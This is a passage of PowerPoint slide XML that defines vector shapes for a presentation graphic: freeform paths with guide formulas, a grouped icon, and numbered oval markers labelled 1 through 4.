              <a:ext cx="1211786" cy="84575"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 53749 w 1211650"/>
                <a:gd name="connsiteY0" fmla="*/ 3175 h 113397"/>
                <a:gd name="connsiteX1" fmla="*/ 517796 w 1211650"/>
                <a:gd name="connsiteY1" fmla="*/ 3175 h 113397"/>
                <a:gd name="connsiteX2" fmla="*/ 513351 w 1211650"/>
                <a:gd name="connsiteY2" fmla="*/ 7620 h 113397"/>
                <a:gd name="connsiteX3" fmla="*/ 513351 w 1211650"/>
                <a:gd name="connsiteY3" fmla="*/ 38099 h 113397"/>
                <a:gd name="connsiteX4" fmla="*/ 520971 w 1211650"/>
                <a:gd name="connsiteY4" fmla="*/ 45719 h 113397"/>
                <a:gd name="connsiteX5" fmla="*/ 684803 w 1211650"/>
                <a:gd name="connsiteY5" fmla="*/ 45719 h 113397"/>
                <a:gd name="connsiteX6" fmla="*/ 692423 w 1211650"/>
                <a:gd name="connsiteY6" fmla="*/ 38099 h 113397"/>
                <a:gd name="connsiteX7" fmla="*/ 692423 w 1211650"/>
                <a:gd name="connsiteY7" fmla="*/ 7620 h 113397"/>
                <a:gd name="connsiteX8" fmla="*/ 687978 w 1211650"/>
                <a:gd name="connsiteY8" fmla="*/ 3175 h 113397"/>
                <a:gd name="connsiteX9" fmla="*/ 1157901 w 1211650"/>
                <a:gd name="connsiteY9" fmla="*/ 3175 h 113397"/>
                <a:gd name="connsiteX10" fmla="*/ 1211650 w 1211650"/>
                <a:gd name="connsiteY10" fmla="*/ 56924 h 113397"/>
                <a:gd name="connsiteX11" fmla="*/ 1211650 w 1211650"/>
                <a:gd name="connsiteY11" fmla="*/ 59648 h 113397"/>
                <a:gd name="connsiteX12" fmla="*/ 1157901 w 1211650"/>
                <a:gd name="connsiteY12" fmla="*/ 113397 h 113397"/>
                <a:gd name="connsiteX13" fmla="*/ 53749 w 1211650"/>
                <a:gd name="connsiteY13" fmla="*/ 113397 h 113397"/>
                <a:gd name="connsiteX14" fmla="*/ 0 w 1211650"/>
                <a:gd name="connsiteY14" fmla="*/ 59648 h 113397"/>
                <a:gd name="connsiteX15" fmla="*/ 0 w 1211650"/>
                <a:gd name="connsiteY15" fmla="*/ 56924 h 113397"/>
                <a:gd name="connsiteX16" fmla="*/ 53749 w 1211650"/>
                <a:gd name="connsiteY16" fmla="*/ 3175 h 113397"/>
                <a:gd name="connsiteX17" fmla="*/ 520971 w 1211650"/>
                <a:gd name="connsiteY17" fmla="*/ 0 h 113397"/>
                <a:gd name="connsiteX18" fmla="*/ 687978 w 1211650"/>
                <a:gd name="connsiteY18" fmla="*/ 3175 h 113397"/>
                <a:gd name="connsiteX19" fmla="*/ 517796 w 1211650"/>
                <a:gd name="connsiteY19" fmla="*/ 3175 h 113397"/>
                <a:gd name="connsiteX20" fmla="*/ 520971 w 1211650"/>
                <a:gd name="connsiteY20" fmla="*/ 0 h 113397"/>
                <a:gd name="connsiteX0" fmla="*/ 53749 w 1211650"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 110222"/>
                <a:gd name="connsiteX1" fmla="*/ 517796 w 1211650"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 110222"/>
                <a:gd name="connsiteX2" fmla="*/ 513351 w 1211650"/>
                <a:gd name="connsiteY2" fmla="*/ 4445 h 110222"/>
                <a:gd name="connsiteX3" fmla="*/ 513351 w 1211650"/>
                <a:gd name="connsiteY3" fmla="*/ 34924 h 110222"/>
                <a:gd name="connsiteX4" fmla="*/ 520971 w 1211650"/>
                <a:gd name="connsiteY4" fmla="*/ 42544 h 110222"/>
                <a:gd name="connsiteX5" fmla="*/ 684803 w 1211650"/>
                <a:gd name="connsiteY5" fmla="*/ 42544 h 110222"/>
                <a:gd name="connsiteX6" fmla="*/ 692423 w 1211650"/>
                <a:gd name="connsiteY6" fmla="*/ 34924 h 110222"/>
                <a:gd name="connsiteX7" fmla="*/ 692423 w 1211650"/>
                <a:gd name="connsiteY7" fmla="*/ 4445 h 110222"/>
                <a:gd name="connsiteX8" fmla="*/ 687978 w 1211650"/>
                <a:gd name="connsiteY8" fmla="*/ 0 h 110222"/>
                <a:gd name="connsiteX9" fmla="*/ 1157901 w 1211650"/>
                <a:gd name="connsiteY9" fmla="*/ 0 h 110222"/>
                <a:gd name="connsiteX10" fmla="*/ 1211650 w 1211650"/>
                <a:gd name="connsiteY10" fmla="*/ 53749 h 110222"/>
                <a:gd name="connsiteX11" fmla="*/ 1211650 w 1211650"/>
                <a:gd name="connsiteY11" fmla="*/ 56473 h 110222"/>
                <a:gd name="connsiteX12" fmla="*/ 1157901 w 1211650"/>
                <a:gd name="connsiteY12" fmla="*/ 110222 h 110222"/>
                <a:gd name="connsiteX13" fmla="*/ 53749 w 1211650"/>
                <a:gd name="connsiteY13" fmla="*/ 110222 h 110222"/>
                <a:gd name="connsiteX14" fmla="*/ 0 w 1211650"/>
                <a:gd name="connsiteY14" fmla="*/ 56473 h 110222"/>
                <a:gd name="connsiteX15" fmla="*/ 0 w 1211650"/>
                <a:gd name="connsiteY15" fmla="*/ 53749 h 110222"/>
                <a:gd name="connsiteX16" fmla="*/ 53749 w 1211650"/>
                <a:gd name="connsiteY16" fmla="*/ 0 h 110222"/>
                <a:gd name="connsiteX17" fmla="*/ 517796 w 1211650"/>
                <a:gd name="connsiteY17" fmla="*/ 0 h 110222"/>
                <a:gd name="connsiteX18" fmla="*/ 687978 w 1211650"/>
                <a:gd name="connsiteY18" fmla="*/ 0 h 110222"/>
                <a:gd name="connsiteX19" fmla="*/ 517796 w 1211650"/>
                <a:gd name="connsiteY19" fmla="*/ 0 h 110222"/>
                <a:gd name="connsiteX0" fmla="*/ 53749 w 1211650"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 110222"/>
                <a:gd name="connsiteX1" fmla="*/ 517796 w 1211650"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 110222"/>
                <a:gd name="connsiteX2" fmla="*/ 513351 w 1211650"/>
                <a:gd name="connsiteY2" fmla="*/ 4445 h 110222"/>
                <a:gd name="connsiteX3" fmla="*/ 513351 w 1211650"/>
                <a:gd name="connsiteY3" fmla="*/ 34924 h 110222"/>
                <a:gd name="connsiteX4" fmla="*/ 520971 w 1211650"/>
                <a:gd name="connsiteY4" fmla="*/ 42544 h 110222"/>
                <a:gd name="connsiteX5" fmla="*/ 684803 w 1211650"/>
                <a:gd name="connsiteY5" fmla="*/ 42544 h 110222"/>
                <a:gd name="connsiteX6" fmla="*/ 692423 w 1211650"/>
                <a:gd name="connsiteY6" fmla="*/ 34924 h 110222"/>
                <a:gd name="connsiteX7" fmla="*/ 692423 w 1211650"/>
                <a:gd name="connsiteY7" fmla="*/ 4445 h 110222"/>
                <a:gd name="connsiteX8" fmla="*/ 687978 w 1211650"/>
                <a:gd name="connsiteY8" fmla="*/ 0 h 110222"/>
                <a:gd name="connsiteX9" fmla="*/ 1157901 w 1211650"/>
                <a:gd name="connsiteY9" fmla="*/ 0 h 110222"/>
                <a:gd name="connsiteX10" fmla="*/ 1211650 w 1211650"/>
                <a:gd name="connsiteY10" fmla="*/ 53749 h 110222"/>
                <a:gd name="connsiteX11" fmla="*/ 1211650 w 1211650"/>
                <a:gd name="connsiteY11" fmla="*/ 56473 h 110222"/>
                <a:gd name="connsiteX12" fmla="*/ 1157901 w 1211650"/>
                <a:gd name="connsiteY12" fmla="*/ 110222 h 110222"/>
                <a:gd name="connsiteX13" fmla="*/ 53749 w 1211650"/>
                <a:gd name="connsiteY13" fmla="*/ 110222 h 110222"/>
                <a:gd name="connsiteX14" fmla="*/ 0 w 1211650"/>
                <a:gd name="connsiteY14" fmla="*/ 56473 h 110222"/>
                <a:gd name="connsiteX15" fmla="*/ 0 w 1211650"/>
                <a:gd name="connsiteY15" fmla="*/ 53749 h 110222"/>
                <a:gd name="connsiteX16" fmla="*/ 53749 w 1211650"/>
                <a:gd name="connsiteY16" fmla="*/ 0 h 11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1650" h="110222">
                  <a:moveTo>
                    <a:pt x="53749" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="517796" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513351" y="4445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513351" y="34924"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="513351" y="39132"/>
                    <a:pt x="516763" y="42544"/>
                    <a:pt x="520971" y="42544"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="684803" y="42544"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="689011" y="42544"/>
                    <a:pt x="692423" y="39132"/>
                    <a:pt x="692423" y="34924"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="692423" y="4445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687978" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1157901" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1187586" y="0"/>
                    <a:pt x="1211650" y="24064"/>
                    <a:pt x="1211650" y="53749"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1211650" y="56473"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1211650" y="86158"/>
                    <a:pt x="1187586" y="110222"/>
                    <a:pt x="1157901" y="110222"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="53749" y="110222"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="24064" y="110222"/>
                    <a:pt x="0" y="86158"/>
                    <a:pt x="0" y="56473"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="53749"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="24064"/>
                    <a:pt x="24064" y="0"/>
                    <a:pt x="537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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Freeform 1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1323975" y="2115529"/>
            <a:ext cx="939688" cy="515088"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 18249 w 23031"/>
              <a:gd name="T1" fmla="*/ 6968 h 12625"/>
              <a:gd name="T2" fmla="*/ 18249 w 23031"/>
              <a:gd name="T3" fmla="*/ 6968 h 12625"/>
              <a:gd name="T4" fmla="*/ 16562 w 23031"/>
              <a:gd name="T5" fmla="*/ 0 h 12625"/>
              <a:gd name="T6" fmla="*/ 11500 w 23031"/>
              <a:gd name="T7" fmla="*/ 875 h 12625"/>
              <a:gd name="T8" fmla="*/ 6469 w 23031"/>
              <a:gd name="T9" fmla="*/ 0 h 12625"/>
              <a:gd name="T10" fmla="*/ 4781 w 23031"/>
              <a:gd name="T11" fmla="*/ 6968 h 12625"/>
              <a:gd name="T12" fmla="*/ 0 w 23031"/>
              <a:gd name="T13" fmla="*/ 9499 h 12625"/>
              <a:gd name="T14" fmla="*/ 4438 w 23031"/>
              <a:gd name="T15" fmla="*/ 11968 h 12625"/>
              <a:gd name="T16" fmla="*/ 11500 w 23031"/>
              <a:gd name="T17" fmla="*/ 12624 h 12625"/>
              <a:gd name="T18" fmla="*/ 18593 w 23031"/>
              <a:gd name="T19" fmla="*/ 11968 h 12625"/>
              <a:gd name="T20" fmla="*/ 23030 w 23031"/>
              <a:gd name="T21" fmla="*/ 9499 h 12625"/>
              <a:gd name="T22" fmla="*/ 18249 w 23031"/>
              <a:gd name="T23" fmla="*/ 6968 h 1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31" h="12625">
                <a:moveTo>
                  <a:pt x="18249" y="6968"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18249" y="6968"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17905" y="4313"/>
                  <a:pt x="17312" y="1938"/>
                  <a:pt x="16562" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14968" y="563"/>
                  <a:pt x="13280" y="875"/>
                  <a:pt x="11500" y="875"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9750" y="875"/>
                  <a:pt x="8063" y="563"/>
                  <a:pt x="6469" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5719" y="1938"/>
                  <a:pt x="5125" y="4313"/>
                  <a:pt x="4781" y="6968"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1875" y="7531"/>
                  <a:pt x="0" y="8468"/>
                  <a:pt x="0" y="9499"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="10499"/>
                  <a:pt x="1750" y="11406"/>
                  <a:pt x="4438" y="11968"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6375" y="12374"/>
                  <a:pt x="8844" y="12624"/>
                  <a:pt x="11500" y="12624"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14186" y="12624"/>
                  <a:pt x="16655" y="12374"/>
                  <a:pt x="18593" y="11968"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21280" y="11406"/>
                  <a:pt x="23030" y="10499"/>
                  <a:pt x="23030" y="9499"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23030" y="8468"/>
                  <a:pt x="21124" y="7531"/>
                  <a:pt x="18249" y="6968"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Oval 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6006618" y="2909280"/>
            <a:ext cx="436880" cy="436880"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>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en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6037404" y="2010781"/>
            <a:ext cx="674291" cy="782109"/>
            <a:chOff x="2139950" y="2465386"/>
            <a:chExt cx="506413" cy="587385"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Freeform 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2139950" y="2871796"/>
              <a:ext cx="506413" cy="180975"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 687 w 1407"/>
                <a:gd name="T1" fmla="*/ 0 h 501"/>
                <a:gd name="T2" fmla="*/ 687 w 1407"/>
                <a:gd name="T3" fmla="*/ 0 h 501"/>
                <a:gd name="T4" fmla="*/ 1406 w 1407"/>
                <a:gd name="T5" fmla="*/ 219 h 501"/>
                <a:gd name="T6" fmla="*/ 1406 w 1407"/>
                <a:gd name="T7" fmla="*/ 469 h 501"/>
                <a:gd name="T8" fmla="*/ 1406 w 1407"/>
                <a:gd name="T9" fmla="*/ 500 h 501"/>
                <a:gd name="T10" fmla="*/ 0 w 1407"/>
                <a:gd name="T11" fmla="*/ 500 h 501"/>
                <a:gd name="T12" fmla="*/ 0 w 1407"/>
                <a:gd name="T13" fmla="*/ 406 h 501"/>
                <a:gd name="T14" fmla="*/ 0 w 1407"/>
                <a:gd name="T15" fmla="*/ 219 h 501"/>
                <a:gd name="T16" fmla="*/ 687 w 1407"/>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7" h="501">
                  <a:moveTo>
                    <a:pt x="687" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="687" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1094" y="0"/>
                    <a:pt x="1406" y="125"/>
                    <a:pt x="1406" y="219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1406" y="219"/>
                    <a:pt x="1406" y="219"/>
                    <a:pt x="1406" y="469"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1406" y="500"/>
                    <a:pt x="1406" y="500"/>
                    <a:pt x="1406" y="500"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="500"/>
                    <a:pt x="0" y="500"/>
                    <a:pt x="0" y="500"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="406"/>
                    <a:pt x="0" y="406"/>
                    <a:pt x="0" y="406"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="344"/>
                    <a:pt x="0" y="281"/>
                    <a:pt x="0" y="219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="125"/>
                    <a:pt x="312" y="0"/>
                    <a:pt x="68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Autofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Freeform 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2195513" y="2465386"/>
              <a:ext cx="393700" cy="382588"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1095"/>
                <a:gd name="T1" fmla="*/ 531 h 1064"/>
                <a:gd name="T2" fmla="*/ 0 w 1095"/>
                <a:gd name="T3" fmla="*/ 531 h 1064"/>
                <a:gd name="T4" fmla="*/ 563 w 1095"/>
                <a:gd name="T5" fmla="*/ 0 h 1064"/>
                <a:gd name="T6" fmla="*/ 1094 w 1095"/>
                <a:gd name="T7" fmla="*/ 531 h 1064"/>
                <a:gd name="T8" fmla="*/ 563 w 1095"/>
                <a:gd name="T9" fmla="*/ 1063 h 1064"/>
                <a:gd name="T10" fmla="*/ 0 w 1095"/>
                <a:gd name="T11" fmla="*/ 531 h 1064"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T10" y="T11"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1095" h="1064">
                  <a:moveTo>
                    <a:pt x="0" y="531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="531"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="219"/>
                    <a:pt x="250" y="0"/>
                    <a:pt x="563" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="844" y="0"/>
                    <a:pt x="1094" y="219"/>
                    <a:pt x="1094" y="531"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1094" y="844"/>
                    <a:pt x="844" y="1063"/>
                    <a:pt x="563" y="1063"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="250" y="1063"/>
                    <a:pt x="0" y="844"/>
                    <a:pt x="0" y="5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Autofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Oval 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4469183" y="5249309"/>
            <a:ext cx="436880" cy="436880"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>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en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="Oval 86"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5522819" y="2115040"/>
            <a:ext cx="436880" cy="436880"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>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en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Oval 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1961816" y="2789491"/>
            <a:ext cx="436880" cy="436880"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>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en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Freeform 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3369002" y="4208376"/>
            <a:ext cx="704922" cy="1394030"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1375"/>
              <a:gd name="T1" fmla="*/ 0 h 2720"/>
              <a:gd name="T2" fmla="*/ 0 w 1375"/>
              <a:gd name="T3" fmla="*/ 0 h 2720"/>
              <a:gd name="T4" fmla="*/ 1374 w 1375"/>
              <a:gd name="T5" fmla="*/ 0 h 2720"/>
              <a:gd name="T6" fmla="*/ 1374 w 1375"/>
              <a:gd name="T7" fmla="*/ 2719 h 2720"/>
              <a:gd name="T8" fmla="*/ 0 w 1375"/>
              <a:gd name="T9" fmla="*/ 2719 h 2720"/>
              <a:gd name="T10" fmla="*/ 0 w 1375"/>
              <a:gd name="T11" fmla="*/ 0 h 2720"/>
              <a:gd name="T12" fmla="*/ 157 w 1375"/>
              <a:gd name="T13" fmla="*/ 2094 h 2720"/>
              <a:gd name="T14" fmla="*/ 157 w 1375"/>
              <a:gd name="T15" fmla="*/ 2094 h 2720"/>
              <a:gd name="T16" fmla="*/ 157 w 1375"/>
              <a:gd name="T17" fmla="*/ 2188 h 2720"/>
              <a:gd name="T18" fmla="*/ 1218 w 1375"/>
              <a:gd name="T19" fmla="*/ 2188 h 2720"/>
              <a:gd name="T20" fmla="*/ 1218 w 1375"/>
              <a:gd name="T21" fmla="*/ 2094 h 2720"/>
              <a:gd name="T22" fmla="*/ 157 w 1375"/>
              <a:gd name="T23" fmla="*/ 2094 h 2720"/>
              <a:gd name="T24" fmla="*/ 157 w 1375"/>
              <a:gd name="T25" fmla="*/ 156 h 2720"/>
              <a:gd name="T26" fmla="*/ 157 w 1375"/>
              <a:gd name="T27" fmla="*/ 156 h 2720"/>
              <a:gd name="T28" fmla="*/ 157 w 1375"/>
              <a:gd name="T29" fmla="*/ 250 h 2720"/>
              <a:gd name="T30" fmla="*/ 1218 w 1375"/>
              <a:gd name="T31" fmla="*/ 250 h 2720"/>
              <a:gd name="T32" fmla="*/ 1218 w 1375"/>
              <a:gd name="T33" fmla="*/ 156 h 2720"/>
              <a:gd name="T34" fmla="*/ 157 w 1375"/>
              <a:gd name="T35" fmla="*/ 156 h 2720"/>
              <a:gd name="T36" fmla="*/ 157 w 1375"/>
              <a:gd name="T37" fmla="*/ 2250 h 2720"/>
              <a:gd name="T38" fmla="*/ 157 w 1375"/>
              <a:gd name="T39" fmla="*/ 2250 h 2720"/>
              <a:gd name="T40" fmla="*/ 157 w 1375"/>
              <a:gd name="T41" fmla="*/ 2344 h 2720"/>
              <a:gd name="T42" fmla="*/ 1218 w 1375"/>
              <a:gd name="T43" fmla="*/ 2344 h 2720"/>
              <a:gd name="T44" fmla="*/ 1218 w 1375"/>
              <a:gd name="T45" fmla="*/ 2250 h 2720"/>
              <a:gd name="T46" fmla="*/ 157 w 1375"/>
              <a:gd name="T47" fmla="*/ 2250 h 2720"/>
              <a:gd name="T48" fmla="*/ 157 w 1375"/>
              <a:gd name="T49" fmla="*/ 2406 h 2720"/>
              <a:gd name="T50" fmla="*/ 157 w 1375"/>
              <a:gd name="T51" fmla="*/ 2406 h 2720"/>
              <a:gd name="T52" fmla="*/ 157 w 1375"/>
              <a:gd name="T53" fmla="*/ 2500 h 2720"/>
              <a:gd name="T54" fmla="*/ 1218 w 1375"/>
              <a:gd name="T55" fmla="*/ 2500 h 2720"/>
              <a:gd name="T56" fmla="*/ 1218 w 1375"/>
              <a:gd name="T57" fmla="*/ 2406 h 2720"/>
              <a:gd name="T58" fmla="*/ 157 w 1375"/>
              <a:gd name="T59" fmla="*/ 2406 h 2720"/>
              <a:gd name="T60" fmla="*/ 624 w 1375"/>
              <a:gd name="T61" fmla="*/ 469 h 2720"/>
              <a:gd name="T62" fmla="*/ 624 w 1375"/>
              <a:gd name="T63" fmla="*/ 469 h 2720"/>
              <a:gd name="T64" fmla="*/ 687 w 1375"/>
              <a:gd name="T65" fmla="*/ 531 h 2720"/>
              <a:gd name="T66" fmla="*/ 749 w 1375"/>
              <a:gd name="T67" fmla="*/ 469 h 2720"/>
              <a:gd name="T68" fmla="*/ 687 w 1375"/>
              <a:gd name="T69" fmla="*/ 406 h 2720"/>
              <a:gd name="T70" fmla="*/ 624 w 1375"/>
              <a:gd name="T71" fmla="*/ 46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5" h="2720">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1374" y="0"/>
                  <a:pt x="1374" y="0"/>
                  <a:pt x="1374" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1374" y="2719"/>
                  <a:pt x="1374" y="2719"/>
                  <a:pt x="1374" y="2719"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="2719"/>
                  <a:pt x="0" y="2719"/>
                  <a:pt x="0" y="2719"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="157" y="2094"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="157" y="2094"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="157" y="2188"/>
                  <a:pt x="157" y="2188"/>
                  <a:pt x="157" y="2188"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1218" y="2188"/>
                  <a:pt x="1218" y="2188"/>
                  <a:pt x="1218" y="2188"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1218" y="2094"/>
                  <a:pt x="1218" y="2094"/>
                  <a:pt x="1218" y="2094"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="157" y="2094"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="157" y="156"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="157" y="156"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="157" y="250"/>
                  <a:pt x="157" y="250"/>
                  <a:pt x="157" y="250"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1218" y="250"/>
                  <a:pt x="1218" y="250"/>
                  <a:pt x="1218" y="250"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1218" y="156"/>
                  <a:pt x="1218" y="156"/>
                  <a:pt x="1218" y="156"/>
                </a:cubicBezTo>
                <a:lnTo>
